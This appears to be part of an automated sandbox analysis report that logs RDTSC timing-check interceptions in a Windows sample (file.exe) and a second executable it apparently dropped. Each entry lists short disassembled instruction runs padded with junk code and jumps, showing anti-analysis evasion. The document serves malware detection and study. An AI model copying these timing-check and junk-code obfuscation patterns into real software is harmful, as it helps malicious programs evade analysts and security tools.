Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D4C0D second address: 5D4C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D4C13 second address: 5D4C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBE44B74B69h 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 jmp 00007FBE44B74B61h 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D5EED second address: 5D5EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D5EF3 second address: 5D5EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBE44B74B56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D5EFD second address: 5D5F01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D7C23 second address: 5D7C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44B74B69h 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D97F3 second address: 5D97FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D97FC second address: 5D9832 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBE44B74B70h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBE44B74B60h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D9832 second address: 5D9861 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBE451FC076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jnp 00007FBE451FC076h 0x00000015 jmp 00007FBE451FC081h 0x0000001a push edx 0x0000001b pop edx 0x0000001c ja 00007FBE451FC076h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D9861 second address: 5D9867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D9867 second address: 5D986B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0367 second address: 4FE0376 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44B74B5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0376 second address: 4FE037C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE037C second address: 4FE0380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0380 second address: 4FE0384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0384 second address: 4FE0396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, cx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0396 second address: 4FE039B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE039B second address: 4FE03A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE03A1 second address: 4FE03A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE03A5 second address: 4FE03A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0402 second address: 4FE0413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop esi 0x0000000d movsx edi, si 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0413 second address: 4FE0419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0419 second address: 4FE041D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE041D second address: 4FE0460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FBE44B74B5Ch 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FBE44B74B5Eh 0x00000016 adc si, 2CB8h 0x0000001b jmp 00007FBE44B74B5Bh 0x00000020 popfd 0x00000021 mov cx, 9CEFh 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0460 second address: 4FE047F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FBE451FC07Dh 0x0000000a jmp 00007FBE451FC07Bh 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE047F second address: 4FE0497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBE44B74B64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F363D second address: 4F3642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE04E3 second address: 4FE04F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBE44B74B61h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE04F8 second address: 4FE04FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE04FC second address: 4FE051A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBE44B74B63h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE051A second address: 4FE0520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0520 second address: 4FE0524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0524 second address: 4FE0539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBE451FC07Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE059F second address: 4FE05A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE05A5 second address: 4FE05A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE05A9 second address: 4FE05C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44B74B5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 6F18537Fh 0x00000010 pushad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE05C7 second address: 4FE062F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FBE451FC087h 0x0000000b xor cx, 4B8Eh 0x00000010 jmp 00007FBE451FC089h 0x00000015 popfd 0x00000016 popad 0x00000017 add dword ptr [esp], 0711C8A9h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007FBE451FC07Ah 0x00000027 jmp 00007FBE451FC085h 0x0000002c popfd 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE062F second address: 4FE0645 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 68060C77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov cl, F9h 0x0000000b popad 0x0000000c call 00007FBEB5DC850Dh 0x00000011 push 762327D0h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov eax, dword ptr [esp+10h] 0x00000021 mov dword ptr [esp+10h], ebp 0x00000025 lea ebp, dword ptr [esp+10h] 0x00000029 sub esp, eax 0x0000002b push ebx 0x0000002c push esi 0x0000002d push edi 0x0000002e mov eax, dword ptr [762C0140h] 0x00000033 xor dword ptr [ebp-04h], eax 0x00000036 xor eax, ebp 0x00000038 push eax 0x00000039 mov dword ptr [ebp-18h], esp 0x0000003c push dword ptr [ebp-08h] 0x0000003f mov eax, dword ptr [ebp-04h] 0x00000042 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000049 mov dword ptr [ebp-08h], eax 0x0000004c lea eax, dword ptr [ebp-10h] 0x0000004f mov dword ptr fs:[00000000h], eax 0x00000055 ret 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0645 second address: 4FE0649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0649 second address: 4FE06C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, 7A98C9B2h 0x0000000b popad 0x0000000c and dword ptr [ebp-04h], 00000000h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FBE44B74B5Fh 0x00000017 sbb al, FFFFFFAEh 0x0000001a jmp 00007FBE44B74B69h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FBE44B74B60h 0x00000026 jmp 00007FBE44B74B65h 0x0000002b popfd 0x0000002c popad 0x0000002d mov edx, dword ptr [ebp+0Ch] 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FBE44B74B5Dh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE06C1 second address: 4FE06DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE06DE second address: 4FE06E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE06E4 second address: 4FE0702 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC082h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, byte ptr [edx] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0702 second address: 4FE071F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44B74B69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE071F second address: 4FE076D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FBE451FC083h 0x00000013 adc cx, 53EEh 0x00000018 jmp 00007FBE451FC089h 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE076D second address: 4FE0772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0772 second address: 4FE0702 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC087h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b jmp 00007FBE451FC086h 0x00000010 jne 00007FBE451FBFC5h 0x00000016 mov al, byte ptr [edx] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE07C4 second address: 4FE0874 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44B74B69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edx, esi 0x0000000b jmp 00007FBE44B74B67h 0x00000010 mov edi, dword ptr [ebp+08h] 0x00000013 jmp 00007FBE44B74B66h 0x00000018 dec edi 0x00000019 jmp 00007FBE44B74B60h 0x0000001e lea ebx, dword ptr [edi+01h] 0x00000021 pushad 0x00000022 jmp 00007FBE44B74B5Eh 0x00000027 mov ebx, eax 0x00000029 popad 0x0000002a mov al, byte ptr [edi+01h] 0x0000002d jmp 00007FBE44B74B5Ch 0x00000032 inc edi 0x00000033 jmp 00007FBE44B74B60h 0x00000038 test al, al 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FBE44B74B67h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0874 second address: 4FE08C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FBEB6444264h 0x0000000f jmp 00007FBE451FC07Eh 0x00000014 mov ecx, edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBE451FC087h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE08C0 second address: 4FE092A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44B74B69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 shr ecx, 02h 0x0000000c jmp 00007FBE44B74B5Eh 0x00000011 rep movsd 0x00000013 rep movsd 0x00000015 rep movsd 0x00000017 rep movsd 0x00000019 rep movsd 0x0000001b jmp 00007FBE44B74B60h 0x00000020 mov ecx, edx 0x00000022 pushad 0x00000023 push esi 0x00000024 jmp 00007FBE44B74B5Dh 0x00000029 pop esi 0x0000002a movsx ebx, ax 0x0000002d popad 0x0000002e and ecx, 03h 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FBE44B74B5Fh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE092A second address: 4FE0930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0930 second address: 4FE0946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rep movsb 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBE44B74B5Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0946 second address: 4FE0964 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC07Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ch, bh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0964 second address: 4FE0986 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, C4h 0x00000005 jmp 00007FBE44B74B62h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0986 second address: 4FE098A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE098A second address: 4FE09A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44B74B69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE09A7 second address: 4FE09E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d mov ax, 1613h 0x00000011 jmp 00007FBE451FC088h 0x00000016 popad 0x00000017 mov dword ptr fs:[00000000h], ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE09E9 second address: 4FE09F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE09F0 second address: 4FE0A58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, al 0x00000005 jmp 00007FBE451FC087h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ecx 0x0000000e jmp 00007FBE451FC086h 0x00000013 pop edi 0x00000014 jmp 00007FBE451FC080h 0x00000019 pop esi 0x0000001a pushad 0x0000001b call 00007FBE451FC07Eh 0x00000020 mov ecx, 087BBD91h 0x00000025 pop esi 0x00000026 mov bx, 8A82h 0x0000002a popad 0x0000002b pop ebx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0A58 second address: 4FE0A92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FBE44B74B61h 0x0000000c xor eax, 27A54656h 0x00000012 jmp 00007FBE44B74B61h 0x00000017 popfd 0x00000018 popad 0x00000019 leave 0x0000001a pushad 0x0000001b movzx ecx, di 0x0000001e push eax 0x0000001f push edx 0x00000020 mov eax, ebx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0A92 second address: 4FE059F instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 retn 0008h 0x0000000a cmp dword ptr [ebp-2Ch], 10h 0x0000000e mov eax, dword ptr [ebp-40h] 0x00000011 jnc 00007FBE451FC075h 0x00000013 push eax 0x00000014 lea edx, dword ptr [ebp-00000590h] 0x0000001a push edx 0x0000001b call esi 0x0000001d push 00000008h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007FBE451FC07Dh 0x00000027 mov ebx, ecx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0BC3 second address: 4FE0BD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0BD1 second address: 4FE0BD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0BD7 second address: 4FE0BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBE44B74B5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0BE9 second address: 4FE0BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C66AF9 second address: C66B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C66F08 second address: C66F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 jo 00007FBE451FC076h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FBE451FC082h 0x00000015 jbe 00007FBE451FC076h 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C66F34 second address: C66F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C67093 second address: C670B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FBE451FC083h 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jne 00007FBE451FC07Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C670B7 second address: C670C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jng 00007FBE44B74B56h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C6721E second address: C67222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C67222 second address: C6722E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C6722E second address: C67232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C67373 second address: C67377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C67377 second address: C6739A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBE451FC076h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FBE451FC087h 0x00000012 jmp 00007FBE451FC081h 0x00000017 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C6739A second address: C6739F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C6A0BE second address: C6A0C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C6A0C3 second address: C6A0F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBE44B74B56h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jno 00007FBE44B74B5Ch 0x00000018 jne 00007FBE44B74B60h 0x0000001e jmp 00007FBE44B74B5Ah 0x00000023 popad 0x00000024 mov eax, dword ptr [eax] 0x00000026 push ebx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	RDTSC instruction interceptor: First address: C6A1A4 second address: C6A1B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
